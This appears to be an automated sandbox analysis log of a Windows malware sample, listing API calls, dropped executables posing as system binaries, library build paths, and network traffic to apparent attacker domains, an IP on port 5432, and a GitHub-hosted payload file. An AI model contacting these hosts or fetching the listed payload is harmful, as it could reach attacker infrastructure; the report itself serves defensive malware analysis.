Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB41E700
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E6D0 CRYPTO_malloc,26_2_00007FFBAB46E6D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB460770 CRYPTO_clear_free,CRYPTO_free,26_2_00007FFBAB460770
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E790 CRYPTO_free,26_2_00007FFBAB46E790
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46E730 CRYPTO_free,26_2_00007FFBAB46E730
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB418720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB418720
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB462740
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,26_2_00007FFBAB42C610
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4625B0 OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB4625B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4225A0 CRYPTO_strdup,CRYPTO_free,26_2_00007FFBAB4225A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4445A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,26_2_00007FFBAB4445A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB49C5A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB45A5C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB45E660
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434660 CRYPTO_free,CRYPTO_malloc,memcpy,26_2_00007FFBAB434660
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462630 OPENSSL_cleanse,CRYPTO_free,26_2_00007FFBAB462630
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB482630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB482630
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB44E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,26_2_00007FFBAB44E510
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB492500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,26_2_00007FFBAB492500
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4224D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,26_2_00007FFBAB4224D0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB438580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB438580
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB417BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB417BEE
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB411BE0 CRYPTO_zalloc,26_2_00007FFBAB411BE0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,26_2_00007FFBAB42BC10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB481C70 CRYPTO_realloc,26_2_00007FFBAB481C70
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,26_2_00007FFBAB47FC90
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF62B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,32_2_00007FFBBAF62B80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF818A0 CryptHashData,32_2_00007FFBBAF818A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB28A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,32_2_00007FFBBAFB28A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF818B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF818B0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFAFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAFAFF30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,32_2_00007FFBBAFB2CC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,32_2_00007FFBBAFB31F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF81820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,32_2_00007FFBBAF81820
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF816F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF816F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF975F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF975F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,32_2_00007FFBBAFB04A6
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF974E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,32_2_00007FFBBAF974E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF97560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,32_2_00007FFBBAF97560
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2a979f99-1
Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh32_2_00007FFBBAF98DE0
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49779 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49861 version: TLS 1.2
Source: 58VSNPxrI4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: ucrtbased.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, ucrtbased.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: PrintUI.pdb source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: PrintUI.pdbGCTL source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB039A40 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,26_2_00007FFBAB039A40
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB0398FC FindClose,FindFirstFileExW,GetLastError,26_2_00007FFBAB0398FC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC5F4 FindClose,FindFirstFileExW,GetLastError,32_2_00007FF70F2AC5F4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC668 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,32_2_00007FF70F2AC668
Source: global trafficTCP traffic: 192.168.2.8:49708 -> 194.26.192.189:5432
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global trafficHTTP traffic detected: GET /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1Host: github.comAccept: */*
Source: global trafficHTTP traffic detected: GET /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownDNS query: name: ipinfo.io
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA2920 recvfrom,memmove,32_2_00007FFBBAFA2920
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global trafficHTTP traffic detected: GET /runvd01/dwl/raw/refs/heads/main/un1/uusb.dat HTTP/1.1Host: github.comAccept: */*
Source: global trafficHTTP traffic detected: GET /runvd01/dwl/refs/heads/main/un1/uusb.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
Source: global trafficDNS traffic detected: DNS query: unvmainx.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: unvdwl.com
Source: global trafficDNS traffic detected: DNS query: dns.google
Source: global trafficDNS traffic detected: DNS query: rootunvdwl.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Fri, 20 Dec 2024 15:21:11 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: E7DD:1E2FCC:102100F:11FBC66:67658B77Accept-Ranges: bytesDate: Fri, 20 Dec 2024 15:21:28 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740054-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1734708088.395102,VS0,VE8Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: f4ac69695fb846c7d8c2b5d2b72fff0393e58471Expires: Fri, 20 Dec 2024 15:26:28 GMTSource-Age: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Fri, 20 Dec 2024 15:20:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Fri, 20 Dec 2024 15:20:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Fri, 20 Dec 2024 15:20:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2846258321.00000000682A4000.00000008.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: http://www.zlib.net/
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848995492.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808573202.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827153646.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/V
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
